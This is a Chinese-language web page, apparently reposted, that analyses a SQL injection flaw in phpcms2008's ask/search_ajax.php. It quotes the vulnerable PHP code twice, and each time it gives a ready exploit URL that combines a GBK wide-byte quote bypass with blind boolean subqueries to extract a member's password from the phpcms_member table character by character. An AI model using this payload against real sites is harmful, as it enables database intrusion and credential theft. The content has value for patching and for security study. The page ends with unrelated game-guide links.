您现在的位置是:网站首页> 编程资料编程资料
phpcms2008 注入漏洞 利用分析_入侵防御_网络安全_
2023-05-24
413人已围观
简介 phpcms2008 注入漏洞 利用分析_入侵防御_网络安全_
这个是最新有人发现的
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
Code:
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
/ask/include/answer.class.php
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
测试方法:
/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
该漏洞文件:ask/search_ajax.php
漏洞说明:
/ask/search_ajax.php
Code:
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
/ask/include/answer.class.php
Code:
function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
{
if($where) $where = " WHERE $where";
if($order) $order = " ORDER BY $order";
$page = max(intval($page), 1);
$offset = $pagesize*($page-1);
$limit = " LIMIT $offset, $pagesize";
$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
$number = $r['number'];
$this->pages = pages($number, $page, $pagesize);
$array = array();
$i = 1;
$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
while($r = $this->db->fetch_array($result))
{
$r['orderid'] = $i;
$array[] = $r;
$i++;
}
$this->number = $this->db->num_rows($result);
$this->db->free_result($result);
return $array;
}
测试方法:
复制代码
代码如下:/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
点击排行
本栏推荐
-
魔兽世界9.0马卓克萨斯背部幻化怎么得 马卓克萨斯boss骨堆刷新机制分享_网络游戏_游戏攻略_
-
魔兽世界9.0实验型构造体部件在哪 实验型构造体组件获取方法_网络游戏_游戏攻略_
-
魔兽世界9.0身居其中任务怎么做 身居其中任务流程_网络游戏_游戏攻略_
-
魔兽世界9.0塞兹仙林的迷雾老二怎么分辨 塞兹仙林的迷雾老二boss辨别技巧_网络游戏_游戏攻略_
-
魔兽世界9.0典狱长之怒能打几次 典狱长之怒是日常还是周常_网络游戏_游戏攻略_
-
魔兽世界9.0周常任务1000心能怎么做 第二周1000心能速刷攻略_网络游戏_游戏攻略_
-
魔兽世界9.0闪雾奔行者怎么得 冷酷的瓦尔菲尔坐骑获取流程_网络游戏_游戏攻略_
猜你喜欢
- 魔兽世界9.0马卓克萨斯背部幻化怎么得 马卓克萨斯boss骨堆刷新机制分享_网络游戏_游戏攻略_
- 魔兽世界9.0实验型构造体部件在哪 实验型构造体组件获取方法_网络游戏_游戏攻略_
- 魔兽世界9.0身居其中任务怎么做 身居其中任务流程_网络游戏_游戏攻略_
- 魔兽世界9.0塞兹仙林的迷雾老二怎么分辨 塞兹仙林的迷雾老二boss辨别技巧_网络游戏_游戏攻略_
- 魔兽世界9.0典狱长之怒能打几次 典狱长之怒是日常还是周常_网络游戏_游戏攻略_
- 魔兽世界9.0周常任务1000心能怎么做 第二周1000心能速刷攻略_网络游戏_游戏攻略_
- 魔兽世界9.0闪雾奔行者怎么得 冷酷的瓦尔菲尔坐骑获取流程_网络游戏_游戏攻略_
